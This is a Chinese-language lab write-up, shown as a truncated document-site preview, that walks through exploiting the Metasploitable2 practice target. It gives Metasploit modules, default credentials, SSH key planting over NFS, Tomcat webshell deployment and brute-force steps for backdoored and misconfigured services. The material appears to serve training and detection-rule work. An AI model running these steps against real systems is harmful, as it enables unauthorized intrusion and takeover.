Metasploitable2靶机漏洞-hanxu_第1页
Metasploitable2靶机漏洞-hanxu_第2页
Metasploitable2靶机漏洞-hanxu_第3页
Metasploitable2靶机漏洞-hanxu_第4页
Metasploitable2靶机漏洞-hanxu_第5页
已阅读5页,还剩27页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

Metasploitable2靶机漏洞弱密码漏洞(WEAK PASSWORD)2SAMBA MS-RPC SHELL命令注入漏洞6VSFTPD源码包后门漏洞7UNREALIRCD后门漏洞9LINUX NFS共享目录配置漏洞10JAVA RMI SERVER命令执行漏洞13TOMCAT管理台默认口令漏洞15ROOT用户弱口令漏洞(SSH爆破)18DISTCC后门漏洞21SAMBA SYSMLINK 默认配置目录遍历漏洞22PHP CGI参数注入执行漏洞25DRUBY 远程代码执行漏洞26INGRESLOCK后门漏洞29弱密码漏洞(Weak Password)安全组织索引CVE:OSVDB:BID:原理系统或者数据库的登录用户,密码简单或者和用户名相同,容易通过暴力破解手段来获取密码。参考链接如下:影响系统/软件所有使用用户名/密码登录的系统/软件都有可能存在此问题。在Metasploitable2中,系统口令、MySQL、PostgreSQL和VNC远程登录都存在弱密码漏洞使用工具Kali-linux利用步骤 系统弱密码登录1. 在kali上执行命令行telnet 51 232. login和password都输入msfadmin3. 登录成功,进入系统4.5. 相同的步骤,弱密码还有user/user、postgres/postgres、sys/batman、klog/123456789、service/service MySQL弱密码登录1. 在kali上执行mysql h 51 u root2. 登录成功,进入mysql系统3. PostgreSQL弱密码登录1. 在kali上执行psql h 51 U postgres2. 输入密码postgres3. 登录成功,进入postgresql系统4. VNC弱密码登录1. 在kali图形界面的终端中执行vncviewer 512. 输入密码password3. 登录成功,进入系统4.5.攻击样本对应规则友商防护能力Samba MS-RPC Shell命令注入漏洞安全组织索引CVE:CVE-2007-2447BID:BID-23972OSVDB:OSVDB-34700原理Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。参考链接如下:/samba/security/CVE-2007-2447.html/intelligence/vulnerabilities/display.php?id=534影响系统/软件Xerox WorkCentre ProXerox WorkCentreVMWare ESX ServerTurbolinux Server/Personal/Multimedia/Home/Desktop/Appliance/FUJITrustix Secure LinuxSUSE Linux EnterpriseSun SolarisSlackware LinuxRedHat EnterpriseMandriva LinuxMandrakeSoft Corporate ServerHP HP-UXGentoo LinuxDebian LinuxApple Mac OS X使用工具Kali,Metasploit利用步骤1. 在kali中执行msfconsole,启动metasploit2. use exploit/multi/samba/usermap_script,选择漏洞3. set RHOST 51,设置要攻击的机器IP4. exploit,开始攻击5. 利用成功,执行uname a验证6.攻击样本对应规则友商防护能力Vsftpd源码包后门漏洞安全组织索引CVE:BID:BID-48539OSVDB:OSVDB-73573原理在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“:)”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。参考链接如下:/2011/07/alert-vsftpd-download-backdoored.html/AetT9sS5影响系统/软件Vsftpd server v2.3.4使用工具Kali,Metasploit利用步骤1. 在kali中执行msfconsole,启动metasploit2. use exploit/unix/ftp/vsftpd_234_backdoor,选择漏洞3. set RHOST 51,设置要攻击的机器IP4. exploit,开始攻击5. 利用成功,执行uname a验证6.攻击样本对应规则友商防护能力UnrealIRCd后门漏洞安全组织索引CVE:CVE-2010-2075BID:BID-40820OSVDB:OSVDB-65445原理在2009年11月到2010年6月间分布于某些镜面站点的UnrealIRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程攻击者能够执行任意代码。参考链接如下:/txt/unrealsecadvisory.20100612.txt影响系统/软件Unreal UnrealIRCd 使用工具Kali,Metasploit利用步骤1. 在kali中执行msfconsole,启动metasploit2. use exploit/unix/irc/unreal_ircd_3281_backdoor,选择漏洞3. set RHOST 51,设置要攻击的机器IP4. exploit,开始攻击5. 利用成功,执行uname a验证6.攻击样本对应规则友商防护能力Linux NFS共享目录配置漏洞安全组织索引CVE:无OSVDB:无BID:无原理NFS 服务配置漏洞,赋予了根目录远程可写权限,导致/root/.ssh/ authorized_keys可被修改,实现远程ssh无密码登陆。影响系统/软件所有Linux系统的NFS服务使用工具Kali-linux利用步骤1. 在kali上执行命令行rpcinfo p 51,查看nfs服务有无开启:2. 用showmount -e 51查看其设置的远程共享目录列表:3. 输入ssh-keygen生成rsa公钥:4. 依次输入l mount t nfs 51:/ /tmp/t00l(预先创建),把51的根目录挂载到/tmp/t00l/下;注:如果提示下图中错误则需要/etc/init.d/rpcbind start来启动mountl cat /root/.ssh/id_rsa.pub /tmp/t00l/root/.ssh/authorized_keys,把生成的公钥追加到靶机的authorized_keys下;l ssh root51,实现无密码登陆攻击样本无对应规则友商防护能力Java RMI SERVER命令执行漏洞安全组织索引CVE:无OSVDB:17535BID:无原理Java RMI Server的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行影响系统/软件Oracle Java RMI Server使用工具Metasploit利用步骤1. Nmap p0-65535 51来查看1099端口是否开启2. 依次输入以下命令:l use exploit/multi/misc/java_rmi_serverl set RHOST 51(靶机IP)l exploitl shell(进入meterpreter时执行)然后即可获得shell了攻击样本对应规则友商防护能力Tomcat管理台默认口令漏洞安全组织索引CVE:无OSVDB:无BID:无原理Tomcat 管理台安装好后需要及时修改默认管理账户,并杜绝弱口令,成功登陆者可以部署任意web应用,包括webshell.影响系统/软件Tomcat使用工具NessusJSPwebshell利用步骤1. 访问51:8081,点击tomcat manager,输入tomcat/tomcat,即可进入管理台2. 在自己机器上准备好JSP webshell(liuz.jsp),通过jar cvf 来打包成liuz.war3. 通过tomcat管理台deploy刚才打包的liuz.war4. 打包成功可以看到应用目录生成(/liuz)5. 访问51/liuz/liuz.jsp得到webshell攻击样本对应规则友商防护能力Root用户弱口令漏洞(SSH爆破)安全组织索引CVE:无OSVDB:无BID:无原理靶机root用户存在弱口令漏洞,在使用指南里并没有指出。.影响系统/软件Linux使用工具metasploit利用步骤1. 输入nmap sV O 51,查看SSH端口是否开启:2. 打开metasploit framework依次输入:use auxiliary/scanner/ssh/ssh_loginset RHOSTS 51set USERNAME rootset PASS_FILE /tmp/r00t/pass.txt(字典文件,需要预先生成)set THREADS 50run root口令爆破成功 ,口令为root3. ssh root51 成功登陆:攻击样本对应规则友商防护能力Distcc后门漏洞安全组织索引CVE:CVE-2004-2687BID:OSVDB:OSVDB-13378原理Distcc用于大量代码在网络服务器上的分布式编译,但是如果配置不严格,容易被滥用执行命令,该漏洞是XCode 1.5版本及其他版本的distcc 2.x版本配置对于服务器端口的访问不限制。参考链接如下:/cgi-bin/cvename.cgi?name=2004-2687影响系统/软件distcc 2.x使用工具Kali,Metasploit利用步骤1. 在kali中执行msfconsole,启动metasploit2. msf use exploit/unix/misc/distcc_exec,选择漏洞3. set RHOST 51,设置要攻击的机器IP4. exploit,开始攻击5. 利用成功,执行id查看权限,uname a验证服务器信息6.攻击样本对应规则友商防护能力Samba sysmlink 默认配置目录遍历漏洞安全组织索引CVE:CVE- 2010-0926BID:33598OSVDB:OSVDB-62145原理Samba是一套实现SMB(server messages block)协议,跨平台进行文件共享和打印共享服务的程序,samba的sambd默认配置在可写文件共享时,存在目录遍历漏洞,远程用户可以通过smbclient端使用一个对称命,创建一个包含.的目录遍历符的软连接 ,可以进行目录遍历以及访问任意文件。参考链接如下:/CVE-2010-0926.html影响系统/软件before 3.3.11, 3.4.x before 3.4.6, and 3.5.x before 3.5.0rc3使用工具Kali,Metasploit利用步骤1. 在kali中执行msfconsole,启动metasploit2. use auxiliary/admin/smb/samba_symlink_traversal,选择漏洞3. set RHOST 51,设置要攻击的机器IP4. msf auxiliary(samba_symlink_traversal) set SMBSHARE tmp 设置SAM可写文件5. exploit,开始攻击6. rootyd0str:# smbclient /51/tmp 在新窗口下执行smbclient命令打开上面生成的共享目录7. smb: cd rootfs 进入rootfs目录8. smb: rootfs ls 执行ls命令列出目录,9. smb: rootfs more /etc/passwd 列出密码文件,利用成功10.11.攻击样本对应规则友商防护能力PHP CGI参数注入执行漏洞安全组织索引CVE:CVE- 2012-1823BID:OSVDB:OSVDB-81633原理CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。参考链接如下:/cve/2012-1823/ /81633 /93979 /exploits/25986 /2012/05/php-cgi-advisory-cve-2012-1823/ /en/116241影响系统/软件before 5.3.12 and 5.4.x before 5.4.2使用工具Kali,Metasploit利用步骤1. 在kali中执行msfconsole,启动metasploit2. msf use exploit/multi/http/php_cgi_arg_injection,选择漏洞3. set RHOST 51,设置要攻击的机器IP4. exploit,开始攻击5. meterpreter ls 获得meterpreter,可执行ls列出目录确认承认6.攻击样本对应规则友商防护能力Druby 远程代码执行漏洞安全组织索引CVE:CVE- 2013-0156(类似)BID:OSVDB:原理Druby配置不当,被滥用执行命令(Distributed Ruby or DRb allows Ruby programs to communicate with each other on the same machine or over a network. DRb uses remote method invocation (RMI) to pass commands and data between processes)参考链接如下:/db/modules/exploit/linux/misc/drb_remote_codeexec/stdlib-1.9.3/libdoc/drb/rdoc/DRb.html/community/metasploit/blog/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156影响系统/软件Ruby 1.8使用工具Kali,Metasploit利用步骤1. rootyd0str:# nmap -p0-65535 -sS -sV 51,NMAP扫描端口及端口应用(或者amap -bqv 51 8787)2. 在kali中执行msfconsole,启动metasploit3. 发现8787druby端口4. msf search drb 搜索dbr相关漏洞5. msf use exp

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论